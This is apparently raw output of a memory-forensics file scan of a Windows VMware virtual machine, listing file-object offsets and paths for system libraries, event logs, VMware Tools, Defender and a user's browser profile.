+0x918b7561d630	\Windows\System32\webio.dll	216
+0x918b7561d7c0	\Windows\System32\Windows.UI.Xaml.dll	216
+0x918b7561d950	\Windows\System32\wcmcsp.dll	216
+0x918b7561dae0	\Windows\System32\UserMgrProxy.dll	216
+0x918b7561e2b0	\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx	216
+0x918b7561e5d0	\Windows\System32\MPSSVC.dll	216
+0x918b7561e760	\Windows\System32\FirewallAPI.dll	216
+0x918b7561e8f0	\Windows\System32\en-US\FirewallAPI.dll.mui	216
+0x918b7561ea80	\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Restricted.evtx	216
+0x918b7561ec10	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b7561f0c0	\Windows\Registration\R000000000006.clb	216
+0x918b7561f3e0	\Windows\System32\cryptsvc.dll	216
+0x918b7561f700	\Windows\System32\trkwks.dll	216
+0x918b7561f890	\Windows\System32\WSHTCPIP.DLL	216
+0x918b7561fa20	\Windows\System32\crypttpmeksvc.dll	216
+0x918b7561fbb0	\trkwks	216
+0x918b7561fd40	\Program Files\VMware\VMware Tools\glib-2.0.dll	216
+0x918b7561fed0	\Program Files\VMware\VMware Tools\gmodule-2.0.dll	216
+0x918b756201f0	\Windows\System32\cryptcatsvc.dll	216
+0x918b75620380	\Windows\System32	216
+0x918b75620510	\Windows\System32\wship6.dll	216
+0x918b756206a0	\Windows\System32\dmenrollengine.dll	216
+0x918b75620830	\Program Files\VMware\VMware Tools\VMware VGAuth\intl.dll	216
+0x918b756209c0	\Program Files\VMware\VMware Tools\gobject-2.0.dll	216
+0x918b75620ce0	\Windows\System32\version.dll	216
+0x918b75620e70	\trkwks	216
+0x918b75621190	\Windows\System32\wdi.dll	216
+0x918b75621320	\$Directory	216
+0x918b756214b0	\Program Files\VMware\VMware Tools\intl.dll	216
+0x918b75621640	\$Directory	216
+0x918b756217d0	\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe	216
+0x918b75621960	\Windows\System32\iphlpsvc.dll	216
+0x918b75621af0	\Windows\System32\diagtrack.dll	216
+0x918b75621c80	\Windows\Registration\R000000000006.clb	216
+0x918b75622130	\Windows\System32\dps.dll	216
+0x918b756222c0	\Windows\System32\perftrack.dll	216
+0x918b75622450	\trkwks	216
+0x918b756225e0	\Windows\System32\webauthn.dll	216
+0x918b75622770	\Program Files\VMware\VMware Tools\vmtoolsd.exe	216
+0x918b75622900	\Windows\System32\netapi32.dll	216
+0x918b75622a90	\Windows\System32\winsqlite3.dll	216
+0x918b75622c20	\Windows\System32\windowsperformancerecordercontrol.dll	216
+0x918b75622db0	\Windows\System32\NetSetupApi.dll	216
+0x918b756230d0	\Windows\System32\fwpolicyiomgr.dll	216
+0x918b756233f0	\Windows\System32\diagperf.dll	216
+0x918b75623580	\Windows\System32\CatRoot	216
+0x918b75623710	\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx	216
+0x918b756238a0	\Program Files\VMware\VMware Tools\VMware VGAuth\glib-2.0.dll	216
+0x918b75623a30	\Windows\System32\pnpts.dll	216
+0x918b75623bc0	\Program Files\VMware\VMware Tools\pcre.dll	216
+0x918b75623d50	\Program Files\VMware\VMware Tools\VMware VGAuth\libeay32.dll	216
+0x918b75623ee0	\Program Files\VMware\VMware Tools\VMware VGAuth\ssleay32.dll	216
+0x918b75624200	\CMApi	216
+0x918b75624520	\Windows\System32\winnlsres.dll	216
+0x918b756246b0	\Windows\System32	216
+0x918b75624840	\Windows\System32\tbs.dll	216
+0x918b756249d0	\Program Files\VMware\VMware Tools\VMware VGAuth\libxml2.dll	216
+0x918b75624e80	\Program Files\VMware\VMware Tools\vmtools.dll	216
+0x918b756251a0	\Windows\System32\ProximityService.dll	216
+0x918b75625330	\Windows\System32\vcruntime140.dll	216
+0x918b756254c0	\Windows\System32\ProximityCommon.dll	216
+0x918b75625650	\Windows\System32\vsstrace.dll	216
+0x918b75625970	\Windows\System32\vssapi.dll	216
+0x918b75625b00	\Dev\Query	216
+0x918b75625c90	\Windows\System32\weretw.dll	216
+0x918b75625e20	\Dev\Query	216
+0x918b75664af0	\Windows\System32\drivers\vmmemctl.sys	216
+0x918b75666640	\Windows\System32\drivers\mrxsmb20.sys	216
+0x918b75667610	\Windows\System32\drivers\srvnet.sys	216
+0x918b75667eb0	\$PrepareToShrinkFileSize	216
+0x918b756685e0	\Windows\System32\drivers\mmcss.sys	216
+0x918b75669890	\Windows\System32\drivers\mrxsmb10.sys	216
+0x918b7566a580	\Windows\System32\drivers\PEAuth.sys	216
+0x918b7566b100	\Windows\System32\drivers\Ndu.sys	216
+0x918b7566e350	\Windows\System32\drivers\tcpipreg.sys	216
+0x918b756729c0	\Windows\System32\drivers\srv2.sys	216
+0x918b756c1100	\Dev\Query	216
+0x918b756c1740	\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx	216
+0x918b756c1a60	\Windows\System32\npmproxy.dll	216
+0x918b756c1bf0	\Dev\Query	216
+0x918b756c1d80	\$Directory	216
+0x918b756c2230	\Dev\Query	216
+0x918b756c2550	\$Directory	216
+0x918b756c26e0	\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx	216
+0x918b756c2870	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Qt5Widgets.dll	216
+0x918b756c2a00	\ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MsMpEng.exe	216
+0x918b756c2b90	\Windows\System32	216
+0x918b756c2eb0	\Windows\System32\en-US\vsstrace.dll.mui	216
+0x918b756c3360	\Windows\System32\en-US\ESENT.dll.mui	216
+0x918b756c34f0	\ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MpSvc.dll	216
+0x918b756c3680	\Windows\System32\en-US\winnlsres.dll.mui	216
+0x918b756c3810	\ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MpClient.dll	216
+0x918b756c39a0	\$Directory	216
+0x918b756c3cc0	\ProgramData\Microsoft\Windows\wfp\wfpdiag.etl	216
+0x918b756c3e50	\$Directory	216
+0x918b756c4170	\Dev\Query	216
+0x918b756c4300	\Windows\System32\srumsvc.dll	216
+0x918b756c4490	\$Extend\$ObjId:$O:$INDEX_ALLOCATION	216
+0x918b756c4620	\Windows\System32\en-US\advapi32.dll.mui	216
+0x918b756c4940	\Windows\System32\adhapi.dll	216
+0x918b756c4970	䧈畬醋￿䧈畬醋￿	0
+0x918b756c4ad0	\$Extend\$ObjId	216
+0x918b756c4df0	\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx	216
+0x918b756c5110	\Windows\System32\iertutil.dll	216
+0x918b756c52a0	\CMNotify	216
+0x918b756c5430	\System Volume Information\tracking.log	216
+0x918b756c5750	\Windows\System32\wfapigp.dll	216
+0x918b756c58e0	\Windows\System32\secur32.dll	216
+0x918b756c5c00	\Program Files\VMware\VMware Tools\VMware VGAuth\libxmlsec.dll	216
+0x918b756c6240	\Program Files\VMware\VMware Tools\VMware VGAuth\libxmlsec-openssl.dll	216
+0x918b756c63d0	\Windows\System32\ProximityCommonPal.dll	216
+0x918b756c66f0	\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx	216
+0x918b756c6880	\CMApi	216
+0x918b756c6a10	\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx	216
+0x918b756c6ba0	\Dev\Query	216
+0x918b756c6ec0	\Windows\System32\wbem\WMIsvc.dll	216
+0x918b756c71e0	\$Directory	216
+0x918b756c7370	\Windows\System32\ProximityServicePal.dll	216
+0x918b756c7500	\Windows\System32\stdole2.tlb	216
+0x918b756c7690	\Windows\System32\srvsvc.dll	216
+0x918b756c7820	\Windows\System32\wbem\MOF	216
+0x918b756c7b40	\CMApi	216
+0x918b756c7cd0	\Windows\System32\wbemcomn.dll	216
+0x918b756c8180	\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx	216
+0x918b756c8310	\Windows\System32\wsock32.dll	216
+0x918b756c8950	\Program Files\VMware\VMware Tools\VMware VGAuth\pcre.dll	216
+0x918b756c8ae0	\Windows\System32\netmsg.dll	216
+0x918b756c8c70	\Windows\System32\en-US\netmsg.dll.mui	216
+0x918b756c8e00	\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx	216
+0x918b756c9120	\CMApi	216
+0x918b756c9440	\Windows\System32\WPTaskScheduler.dll	216
+0x918b756c95d0	\Windows\System32\es.dll	216
+0x918b756c9760	\Windows\System32\pcasvc.dll	216
+0x918b756c98f0	\Windows\System32\wpnservice.dll	216
+0x918b756c9a80	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b756c9c10	\Windows\System32\wpncore.dll	216
+0x918b756ca0c0	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b756ca250	\Windows\System32\esent.dll	216
+0x918b756ca3e0	\Windows\System32\MTFServer.dll	216
+0x918b756ca570	\Windows\System32\Windows.Devices.Enumeration.dll	216
+0x918b756ca700	\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx	216
+0x918b756ca890	\$Directory	216
+0x918b756caa20	\gecko.4576.3988.14258203149884878546	216
+0x918b756cabb0	\Windows\SysWOW64\WSHTCPIP.DLL	216
+0x918b756caed0	\Program Files\VMware\VMware Tools\icudt44l.dat	216
+0x918b756cb510	\Windows\System32\cdp.dll	216
+0x918b756cb6a0	\Windows\System32\vsocklib.dll	216
+0x918b756cb9c0	\pagefile.sys	216
+0x918b756cbb50	\$Directory	216
+0x918b756cc190	\$Directory	216
+0x918b756cc960	\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx	216
+0x918b756ccaf0	\Program Files (x86)\Mozilla Firefox\browser\features\formautofill@mozilla.org.xpi	216
+0x918b756ccc80	\Windows\Temp\vmware-vmsvc-SYSTEM.log	216
+0x918b756cd2c0	\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx	216
+0x918b756cd5e0	\CMNotify	216
+0x918b756cd900	\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx	216
+0x918b756cdc20	\Program Files\VMware\VMware Tools\plugins\common\hgfsServer.dll	216
+0x918b756ce0d0	\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx	216
+0x918b756ce710	\Program Files\VMware\VMware Tools\hgfs.dll	216
+0x918b756ce8a0	\CMApi	216
+0x918b756ceee0	\Windows\System32\vfuprov.dll	216
+0x918b756cf200	\Windows\System32\eeprov.dll	216
+0x918b756cf390	\Windows\System32\nduprov.dll	216
+0x918b756cf6b0	\$Directory	216
+0x918b756cfb60	\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx	216
+0x918b756d01a0	\Windows\System32\mpr.dll	216
+0x918b756d0330	\Windows\System32\dbgcore.dll	216
+0x918b756d07e0	\Windows\System32\en-US\mscms.dll.mui	216
+0x918b756d0b00	\Windows\System32\wpnsruprov.dll	216
+0x918b756d0c90	\Windows\System32\ncuprov.dll	216
+0x918b75726360	\Windows\System32\LogFiles\WMI\RtBackup\EtwRTWFP-IPsec Diagnostics.etl	216
+0x918b75786490	\	216
+0x918b75932290	\Windows\System32\srumapi.dll	216
+0x918b759325b0	\Windows\System32\httpprxm.dll	216
+0x918b75932740	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b759328d0	\$Directory	216
+0x918b75932a60	\Windows\System32\adhsvc.dll	216
+0x918b75932d80	\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx	216
+0x918b759330a0	\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx	216
+0x918b75933230	\Windows\System32\energyprov.dll	216
+0x918b759333c0	\Endpoint	216
+0x918b75933550	\Windows\System32\SleepStudy\ScreenOn\ScreenOnPowerStudyTraceSession-2023-11-17-15-49-38.etl	216
+0x918b759336e0	\Endpoint	216
+0x918b75933870	\Endpoint	216
+0x918b75933a00	\Windows\System32\taskhostw.exe	216
+0x918b75933b90	\$Directory	216
+0x918b75933d20	\Endpoint	216
+0x918b759341d0	\Winsock2\CatalogChangeListener-3d0-0	216
+0x918b759344f0	\Windows\System32\sscore.dll	216
+0x918b75934680	\Windows\System32\en-US\wldap32.dll.mui	216
+0x918b759349a0	\Endpoint	216
+0x918b75934b30	\Program Files\VMware\VMware Tools\plugins\common\hgfsUsability.dll	216
+0x918b75934e50	\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx	216
+0x918b75935170	\Program Files\VMware\VMware Tools\plugins\common\vix.dll	216
+0x918b75935300	\Windows\System32\en-US\iphlpsvc.dll.mui	216
+0x918b75935490	\Windows\System32\sscoreext.dll	216
+0x918b75935940	\CMApi	216
+0x918b75935ad0	\swapfile.sys	216
+0x918b75935c60	\Windows\System32\usoapi.dll	216
+0x918b75935df0	\Program Files\VMware\VMware Tools\plugins\vmsvc\appInfo.dll	216
+0x918b75936110	\Windows\System32\Windows.Shell.ServiceHostBuilder.dll	216
+0x918b75936430	\Windows\System32\wmidcom.dll	216
+0x918b759365c0	\$ConvertToNonresident	216
+0x918b759368e0	\Windows\System32\resutils.dll	216
+0x918b75937240	\Windows\System32\Windows.System.Launcher.dll	216
+0x918b75937560	\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\resources.pri	216
+0x918b759376f0	\Windows\System32\mi.dll	216
+0x918b75937880	\Windows\System32\en-US\taskhostw.exe.mui	216
+0x918b75937a10	\Windows\Fonts\segoeuil.ttf	216
+0x918b75937ba0	\Windows\System32\miutils.dll	216
+0x918b75937d30	\$Directory	216
+0x918b75937ec0	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f\comctl32.dll	216
+0x918b75938370	\Windows\System32\msvcp140.dll	216
+0x918b75938500	\Windows\System32\clusapi.dll	216
+0x918b75938690	\Program Files\VMware\VMware Tools\libeay32.dll	216
+0x918b75938820	\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db	216
+0x918b759389b0	\ProgramData\Microsoft\Windows\Caches\cversions.2.db	216
+0x918b75938b40	\ProgramData\VMware\VMware VGAuth\logfile.txt.0	216
+0x918b75938cd0	\Program Files\VMware\VMware Tools\ssleay32.dll	216
+0x918b75938e60	\Windows\System32\winevt\Logs\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx	216
+0x918b75939310	\$Directory	216
+0x918b759394a0	\Windows\System32\cmd.exe	216
+0x918b75939630	\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db	216
+0x918b759397c0	\Windows\System32\winevt\Logs\Microsoft-Windows-SMBClient%4Operational.evtx	216
+0x918b75939950	\Program Files\VMware\VMware Tools\plugins\vmsvc\deployPkgPlugin.dll	216
+0x918b75939ae0	\Windows\System32\winevt\Logs\Microsoft-Windows-Dhcp-Client%4Admin.evtx	216
+0x918b7593a120	\Program Files\VMware\VMware Tools\deployPkg.dll	216
+0x918b7593a2b0	\$Directory	216
+0x918b7593a440	\Windows\System32\wbem\wbemcore.dll	216
+0x918b7593aa80	\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx	216
+0x918b7593ac10	\CMNotify	216
+0x918b7593ada0	\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db	216
+0x918b7593b250	\$Directory	216
+0x918b7593b570	\$Directory	216
+0x918b7593b700	\Windows\System32\en-US\user32.dll.mui	216
+0x918b7593b890	\Windows\SysWOW64\en-US\user32.dll.mui	216
+0x918b7593bbb0	\CMNotify	216
+0x918b7593bd40	\Windows\System32\wbem\wbemprox.dll	216
+0x918b7593bed0	\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx	216
+0x918b7593c510	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b7593c9c0	\CMNotify	216
+0x918b7593cce0	\CMNotify	216
+0x918b7593ce70	\Windows	216
+0x918b7593d320	\Winsock2\CatalogChangeListener-258-0	216
+0x918b7593d4b0	\Windows\Prefetch\SVCHOST.EXE-7B92DD11.pf	216
+0x918b7593d640	\CMNotify	216
+0x918b7593d7d0	\CMNotify	216
+0x918b7593daf0	\Endpoint	216
+0x918b7593de10	\Windows\System32\provsvc.dll	216
+0x918b7593e2c0	\Endpoint	216
+0x918b7593e5e0	\srvsvc	216
+0x918b7593e770	\Windows\System32\en-US\vsstrace.dll.mui	216
+0x918b7593e900	\Windows\System32\wbem\esscli.dll	216
+0x918b7593ec20	\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx	216
+0x918b7593edb0	\Windows\System32\en-US\user32.dll.mui	216
+0x918b7593f260	\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Audit.evtx	216
+0x918b7593f3f0	\Windows\System32\wbem\wbemsvc.dll	216
+0x918b7593f580	\Output	216
+0x918b7593f710	\$Directory	216
+0x918b7593f8a0	\Windows\System32\winevt\Logs\Microsoft-Windows-DeviceSetupManager%4Operational.evtx	216
+0x918b7593fa30	\Windows\System32\wbem\repdrvfs.dll	216
+0x918b7593fbc0	\Input	216
+0x918b7593fee0	\Windows\System32\dosvc.dll	216
+0x918b75940200	\Windows\Registration\R000000000006.clb	216
+0x918b75940390	\Windows\System32\en-US\dosvc.dll.mui	216
+0x918b75940520	\Windows\Registration\R000000000006.clb	216
+0x918b759406b0	\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Security.evtx	216
+0x918b75940840	\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx	216
+0x918b75940a00	੘疔醋￿੘疔醋￿	0
+0x918b75940b60	\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx	216
+0x918b75940e80	\Program Files\VMware\VMware Tools\plugins\vmsvc\diskWiper.dll	216
+0x918b759411a0	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\MSIMGSIZ.DAT	216
+0x918b75941330	\Windows\System32\wbem\fastprox.dll	216
+0x918b759414c0	\Windows\System32\wbem\wmiutils.dll	216
+0x918b75941b00	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b75941e20	\Program Files\VMware\VMware Tools\plugins\vmsvc\guestInfo.dll	216
+0x918b75a9c100	\Program Files\VMware\VMware Tools\plugins\vmsvc\guestStore.dll	216
+0x918b75a9c290	\CMApi	216
+0x918b75a9c420	\CMNotify	216
+0x918b75a9c740	\Windows\System32\en-US\dnsapi.dll.mui	216
+0x918b75a9c8d0	\Endpoint	216
+0x918b75a9ca60	\Windows\System32\Windows.Security.Authentication.OnlineId.dll	216
+0x918b75a9cbf0	\$Directory	216
+0x918b75a9cd80	\Windows\Registration\R000000000006.clb	216
+0x918b75a9d0a0	\Windows\Registration\R000000000006.clb	216
+0x918b75a9d230	\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Connectivity.evtx	216
+0x918b75a9d3c0	\vgauth-service	216
+0x918b75a9d550	\$Directory	216
+0x918b75a9d6e0	\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx	216
+0x918b75a9d870	\Windows\System32\wbem\Repository\MAPPING1.MAP	216
+0x918b75a9da00	\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Audit.evtx	216
+0x918b75a9db90	\Program Files\VMware\VMware Tools\plugins\vmsvc\hwUpgradeHelper.dll	216
+0x918b75a9dd20	\Windows\System32\wbem\Repository\MAPPING3.MAP	216
+0x918b75a9deb0	\Windows\System32\svchost.exe	216
+0x918b75a9e1d0	\Windows\System32\wbem\Repository\INDEX.BTR	216
+0x918b75a9e360	\Program Files\VMware\VMware Tools\plugins\vmsvc\powerOps.dll	216
+0x918b75a9e4f0	\Windows\System32\wbem\Repository\MAPPING2.MAP	216
+0x918b75a9e680	\Windows\System32\wbem\Repository\OBJECTS.DATA	216
+0x918b75a9e810	\Windows\System32\Windows.UI.Immersive.dll	216
+0x918b75a9e9a0	\Windows\System32\SearchFilterHost.exe	216
+0x918b75a9eb30	\Program Files\VMware\VMware Tools\plugins\vmsvc\resolutionSet.dll	216
+0x918b75a9ecc0	\Program Files\VMware\VMware Tools\plugins\vmsvc\timeSync.dll	216
+0x918b75a9ee50	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage\default\https+++www.youtube.com\ls\data.sqlite	216
+0x918b75a9f170	\Program Files\VMware\VMware Tools\plugins\vmsvc\vmbackup.dll	216
+0x918b75a9f490	\Windows\Registration\R000000000006.clb	216
+0x918b75a9f620	\ProgramData\Microsoft\Windows Defender\Support\MPLog-20231116-212734.log	216
+0x918b75a9f7b0	\Sessions\1\AppContainerNamedObjects\S-1-15-2-1714399563-1326177402-2048222277-143663168-2151391019-765408921-4098702777	216
+0x918b75a9f940	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db	216
+0x918b75a9fad0	\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx	216
+0x918b75a9fc60	\Windows\Prefetch\SVCHOST.EXE-922543B0.pf	216
+0x918b75a9fdf0	\$Directory	216
+0x918b75aa0110	\Windows\System32\MpSigStub.exe	216
+0x918b75aa02a0	\Users\santa\Desktop\desktop.ini	216
+0x918b75aa0430	\Windows\System32\comsvcs.dll	216
+0x918b75aa05c0	\Windows\SysWOW64\linkinfo.dll	216
+0x918b75aa0750	\$Directory	216
+0x918b75aa08e0	\ProgramData\Microsoft\Diagnosis\EventStore.db	216
+0x918b75aa0a70	\$Directory	216
+0x918b75aa0c00	\Windows\System32\dllhost.exe	216
+0x918b75aa0d90	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\ActivationStore.dat	216
+0x918b75aa10b0	\Windows\System32\spinf.dll	216
+0x918b75aa1240	\$Directory	216
+0x918b75aa13d0	\$Directory	216
+0x918b75aa1560	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1	216
+0x918b75aa16f0	\Windows\System32\taskschd.dll	216
+0x918b75aa1880	\Windows\System32\dllhost.exe	216
+0x918b75aa1a10	\Windows\System32	216
+0x918b75aa1d30	\Windows\Registration\R000000000006.clb	216
+0x918b75aa21e0	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2	216
+0x918b75aa2370	\$Directory	216
+0x918b75aa2500	\Windows\System32\srvcli.dll	216
+0x918b75aa2690	\Windows\System32\en-US\twinapi.appcore.dll.mui	216
+0x918b75aa2820	\Windows\System32\comsvcs.dll	216
+0x918b75aa29b0	\Windows\System32\bcd.dll	216
+0x918b75aa2b40	\ProgramData\Microsoft\Diagnosis\EventStore.db-wal	216
+0x918b75aa2cd0	\Windows\System32\winevt\Logs\Microsoft-Windows-UniversalTelemetryClient%4Operational.evtx	216
+0x918b75aa2e60	\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4FirewallDiagnostics.evtx	216
+0x918b75aa3180	\ProgramData\Microsoft\Windows Defender\Support\MPScanSkip-20231117-153013.log	216
+0x918b75aa34a0	\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx	216
+0x918b75aa3630	\$Directory	216
+0x918b75aa37c0	\Windows\System32\DWrite.dll	216
+0x918b75aa3950	\Windows\Registration\{02D4B3F1-FD88-11D1-960D-00805FC79235}.{6682993A-C0E8-4D3F-BF57-F45542DC534B}.crmlog	216
+0x918b75aa3ae0	\ProgramData\Microsoft\Windows Defender\Support\MPDeviceControl-20231117-153013.log	216
+0x918b75aa3c70	\$Directory	216
+0x918b75aa3e00	\ProgramData\Microsoft\Diagnosis\EventStore.db-shm	216
+0x918b75aa4120	\ProgramData\Microsoft\Windows Defender\Support\MpWppTracing-20231117-154944-00000003-ffffffff.bin	216
+0x918b75aa42b0	\Windows\System32\txflog.dll	216
+0x918b75aa45d0	\ProgramData\Microsoft\Windows Defender\Support\MPDetection-20231116-212734.log	216
+0x918b75aa4760	\Windows\Registration\R000000000006.clb	216
+0x918b75aa48f0	\Windows\System32\FlightSettings.dll	216
+0x918b75aa4a80	\Windows\System32\stdole2.tlb	216
+0x918b75aa4c10	\Windows\System32\mskeyprotect.dll	216
+0x918b75aa4da0	\Windows\System32\BcastDVRCommon.dll	216
+0x918b75aa50c0	\Windows\System32\bcastdvruserservice.dll	216
+0x918b75aa5250	\$Directory	216
+0x918b75aa53e0	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\GameBar.exe	216
+0x918b75aa5570	\Windows\System32\comres.dll	216
+0x918b75aa5700	\Windows\SysWOW64\Windows.ApplicationModel.dll	216
+0x918b75aa5890	\Windows\System32\mtxoci.dll	216
+0x918b75aa5a20	\$Directory	216
+0x918b75aa5bb0	\$Directory	216
+0x918b75aa5d40	\Windows\System32\xolehlp.dll	216
+0x918b75aa5ed0	\Windows\System32\ktmw32.dll	216
+0x918b75aa61f0	\Windows\System32\sspicli.dll	216
+0x918b75aa6380	\Windows\System32\mtxclu.dll	216
+0x918b75aa66a0	\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db	216
+0x918b75aa6830	\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db-shm	216
+0x918b75aa69c0	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b75aa6b50	\Windows\System32\msdtc.exe	216
+0x918b75aa6ce0	\Windows\System32\en-US\combase.dll.mui	216
+0x918b75aa6e70	\Windows\System32\amsi.dll	216
+0x918b75aa7190	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b75aa7320	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db	216
+0x918b75aa74b0	\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db-wal	216
+0x918b75aa7640	\Windows\System32\cscapi.dll	216
+0x918b75aa77d0	\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db-wal	216
+0x918b75aa7960	\Windows\Registration\R000000000006.clb	216
+0x918b75aa7af0	\ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MpOAV.dll	216
+0x918b75aa7c80	\Windows\System32\Windows.UI.Core.TextInput.dll	216
+0x918b75aa7e10	\Windows\System32	216
+0x918b75aa8130	\Windows\System32\msdtcprx.dll	216
+0x918b75aa82c0	\Windows\Fonts\segoeui.ttf	216
+0x918b75aa8450	\ProgramData\Microsoft\Windows Defender\Support\MpWppTracing-20231117-154944-00000003-ffffffff.bin	216
+0x918b75aa85e0	\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db-shm	216
+0x918b75aa8a90	\Windows\System32\storewuauth.dll	216
+0x918b75aa8db0	\Windows\System32\en-US\msdtcVSp1res.dll.mui	216
+0x918b75aa90d0	\Windows\System32\wbem\WmiPrvSD.dll	216
+0x918b75aa9260	\Windows\System32\MsDtc\Trace\dtctrace.log	216
+0x918b75aa93f0	\Windows\System32\wbem\wbemess.dll	216
+0x918b75aa9580	\Windows\Registration\R000000000006.clb	216
+0x918b75aa9710	\Users\santa\AppData\Local\Mozilla\Firefox\Profiles\888jya8e.default-release\cache2\entries\90986EF1909EF6B5244F9775F7FBF9E3ADD68DE9	216
+0x918b75aa9a30	\Windows\System32\OneCoreCommonProxyStub.dll	216
+0x918b75aa9d50	\ProgramData\Microsoft\Diagnosis\Sideload	216
+0x918b75aa9ee0	\Device\HarddiskVolume4\Users\santa\AppData\Local\Microsoft\Windows\UsrClass.dat{80f87ee9-850a-11ee-b495-000c29cb6a43}.TM	216
+0x918b75aaa200	\Windows\System32\en-US\msdtc.exe.mui	216
+0x918b75aaa390	\Windows\System32\msdtctm.dll	216
+0x918b75aaa6b0	\Windows\System32\ncobjapi.dll	216
+0x918b75aaa840	\ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\Drivers\WdNisDrv.sys	216
+0x918b75aaa9d0	\Windows\System32\msdtclog.dll	216
+0x918b75aaab60	\$Directory	216
+0x918b75aaae80	\wkssvc	216
+0x918b75aab330	\Windows\System32\MsDtc\MSDTC.LOG	216
+0x918b75aab4c0	\Windows\System32\Windows.UI.Xaml.Resources.19h1.dll	216
+0x918b75aab650	\CMApi	216
+0x918b75aab970	\Device\HarddiskVolume4\Users\santa\AppData\Local\Microsoft\Windows\UsrClass.dat{80f87ee9-850a-11ee-b495-000c29cb6a43}.TM	216
+0x918b75aabb00	\Windows\System32\aepic.dll	216
+0x918b75aabe20	\Windows\System32\TileDataRepository.dll	216
+0x918b75c24150	\Windows\System32\Windows.Globalization.dll	216
+0x918b75c242e0	\Windows\System32	216
+0x918b75c24470	\Windows\System32\catsrv.dll	216
+0x918b75c24600	\Windows\System32\winevt\Logs\Parameters.evtx	216
+0x918b75c24790	\Windows\appcompat\Programs\Amcache.hve.LOG2	216
+0x918b75c24ab0	\Windows\System32\spp\store\2.0\data.dat	216
+0x918b75c24c40	\$Directory	216
+0x918b75c24dd0	\Windows\System32	216
